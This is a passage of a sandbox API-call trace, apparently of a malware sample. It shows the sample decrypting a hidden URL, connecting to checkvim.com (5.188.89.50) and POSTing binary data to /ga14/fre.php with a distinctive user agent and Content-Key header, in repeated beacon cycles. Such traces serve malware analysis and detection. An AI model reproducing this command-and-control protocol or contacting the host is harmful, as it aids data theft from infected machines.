(HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0308.701] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.702] CryptImportKey (in: hProv=0x86f710, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e470) returned 1 [0308.702] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.702] CryptSetKeyParam (hKey=0x87e470, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0308.703] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.703] CryptSetKeyParam (hKey=0x87e470, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.703] GetProcessHeap () returned 0x840000 [0308.703] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0308.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.704] CryptDecrypt (in: hKey=0x87e470, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0308.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.705] CryptDestroyKey (hKey=0x87e470) returned 1 [0308.705] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.705] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0308.705] GetProcessHeap () returned 0x840000 [0308.706] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0308.706] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.706] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0308.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.707] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0308.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.708] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0308.708] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.709] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0308.709] GetProcessHeap () returned 0x840000 [0308.709] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0308.709] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0308.709] GetProcessHeap () returned 0x840000 [0308.709] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0308.709] GetProcessHeap () returned 0x840000 [0308.709] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0308.709] GetProcessHeap () returned 0x840000 [0308.709] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0308.709] GetProcessHeap () returned 0x840000 [0308.709] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0308.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.710] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0308.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.714] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0308.718] GetProcessHeap () returned 0x840000 [0308.718] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0308.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.719] CryptImportKey (in: hProv=0x86f688, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3f0) returned 1 [0308.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.720] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0308.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.720] CryptSetKeyParam (hKey=0x87e3f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0308.720] GetProcessHeap () returned 0x840000 [0308.720] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0308.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.721] CryptDecrypt (in: hKey=0x87e3f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0308.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.722] CryptDestroyKey (hKey=0x87e3f0) returned 1 [0308.722] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0308.723] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0308.723] GetProcessHeap () returned 0x840000 [0308.723] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0308.723] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.723] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0308.724] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.724] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0308.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0308.725] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0308.725] GetProcessHeap () returned 0x840000 [0308.725] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0308.725] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871538*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0308.727] GetProcessHeap () returned 0x840000 [0308.727] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0308.727] socket (af=2, type=1, protocol=6) returned 0x51c [0308.727] connect (s=0x51c, name=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0308.799] FreeAddrInfoW (pAddrInfo=0x871538*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c80*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0308.799] GetProcessHeap () returned 0x840000 [0308.799] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0308.799] GetProcessHeap () returned 0x840000 [0308.799] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0308.800] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0308.802] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0308.802] GetProcessHeap () returned 0x840000 [0308.802] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0308.802] GetProcessHeap () returned 0x840000 [0308.802] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0308.802] GetProcessHeap () returned 0x840000 [0308.802] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fa70 [0308.802] GetProcessHeap () returned 0x840000 [0308.802] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0308.803] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0308.804] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0308.804] GetProcessHeap () returned 0x840000 [0308.804] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0308.804] GetProcessHeap () returned 0x840000 [0308.805] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0308.805] send (s=0x51c, buf=0x873a58*, len=237, flags=0) returned 237 [0308.806] send (s=0x51c, buf=0x87eb58*, len=159, flags=0) returned 159 [0308.806] GetProcessHeap () returned 0x840000 [0308.806] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0308.806] recv (in: s=0x51c, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0309.172] GetProcessHeap () returned 0x840000 [0309.172] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0309.172] GetProcessHeap () returned 0x840000 [0309.172] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa70 | out: hHeap=0x840000) returned 1 [0309.172] GetProcessHeap () returned 0x840000 [0309.172] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0309.172] GetProcessHeap () returned 0x840000 [0309.172] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0309.172] closesocket (s=0x51c) returned 0 [0309.172] GetProcessHeap () returned 0x840000 [0309.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0309.173] GetProcessHeap () returned 0x840000 [0309.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0309.173] GetProcessHeap () returned 0x840000 [0309.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0309.173] GetProcessHeap () returned 0x840000 [0309.173] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0309.173] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x117c) returned 0x51c [0309.175] Sleep (dwMilliseconds=0xea60) [0309.203] GetProcessHeap () returned 0x840000 [0309.203] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0309.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.204] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0309.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.210] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0309.216] GetProcessHeap () returned 0x840000 [0309.216] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0309.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.217] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0309.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.218] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0309.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.219] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.219] GetProcessHeap () returned 0x840000 [0309.219] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0309.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.220] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0309.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.220] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0309.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.304] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0309.304] GetProcessHeap () returned 0x840000 [0309.304] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0309.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.305] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.306] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.315] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.316] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.316] GetProcessHeap () returned 0x840000 [0309.316] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0309.316] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0309.316] GetProcessHeap () returned 0x840000 [0309.316] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0309.316] GetProcessHeap () returned 0x840000 [0309.316] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0309.316] GetProcessHeap () returned 0x840000 [0309.317] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0309.317] GetProcessHeap () returned 0x840000 [0309.317] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0309.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.317] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0309.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.322] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0309.328] GetProcessHeap () returned 0x840000 [0309.328] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0309.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.329] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0309.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.329] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0309.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.330] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.330] GetProcessHeap () returned 0x840000 [0309.330] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0309.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.331] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0309.332] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.332] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0309.333] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.333] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0309.333] GetProcessHeap () returned 0x840000 [0309.333] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0309.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.334] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0309.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.335] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0309.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.336] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0309.336] GetProcessHeap () returned 0x840000 [0309.336] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0309.336] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0309.341] GetProcessHeap () returned 0x840000 [0309.341] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0309.341] socket (af=2, type=1, protocol=6) returned 0x520 [0309.341] connect (s=0x520, name=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0309.406] FreeAddrInfoW (pAddrInfo=0x8712e0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a88*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0309.406] GetProcessHeap () returned 0x840000 [0309.406] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0309.406] GetProcessHeap () returned 0x840000 [0309.406] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0309.407] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0309.408] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0309.408] GetProcessHeap () returned 0x840000 [0309.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0309.408] GetProcessHeap () returned 0x840000 [0309.408] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0309.408] GetProcessHeap () returned 0x840000 [0309.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fdd0 [0309.408] GetProcessHeap () returned 0x840000 [0309.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0309.409] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0309.409] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0309.409] GetProcessHeap () returned 0x840000 [0309.409] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0309.409] GetProcessHeap () returned 0x840000 [0309.409] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0309.409] send (s=0x520, buf=0x873a58*, len=237, flags=0) returned 237 [0309.410] send (s=0x520, buf=0x87eb58*, len=159, flags=0) returned 159 [0309.410] GetProcessHeap () returned 0x840000 [0309.410] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0309.410] recv (in: s=0x520, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0309.787] GetProcessHeap () returned 0x840000 [0309.787] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0309.787] GetProcessHeap () returned 0x840000 [0309.787] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0309.787] GetProcessHeap () returned 0x840000 [0309.787] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0309.787] GetProcessHeap () returned 0x840000 [0309.787] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0309.787] closesocket (s=0x520) returned 0 [0309.787] GetProcessHeap () returned 0x840000 [0309.787] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0309.788] GetProcessHeap () returned 0x840000 [0309.788] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0309.788] GetProcessHeap () returned 0x840000 [0309.788] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0309.788] GetProcessHeap () returned 0x840000 [0309.788] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0309.788] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x98c) returned 0x520 [0309.790] Sleep (dwMilliseconds=0xea60) [0309.806] GetProcessHeap () returned 0x840000 [0309.806] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0309.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.808] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0309.816] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.816] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0309.821] GetProcessHeap () returned 0x840000 [0309.821] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0309.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.822] CryptImportKey (in: hProv=0x86f710, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e8b0) returned 1 [0309.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.822] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0309.823] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.823] CryptSetKeyParam (hKey=0x87e8b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.823] GetProcessHeap () returned 0x840000 [0309.823] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0309.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.824] CryptDecrypt (in: hKey=0x87e8b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0309.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.825] CryptDestroyKey (hKey=0x87e8b0) returned 1 [0309.825] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0309.825] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0309.825] GetProcessHeap () returned 0x840000 [0309.826] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0309.826] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0309.826] StrStrA 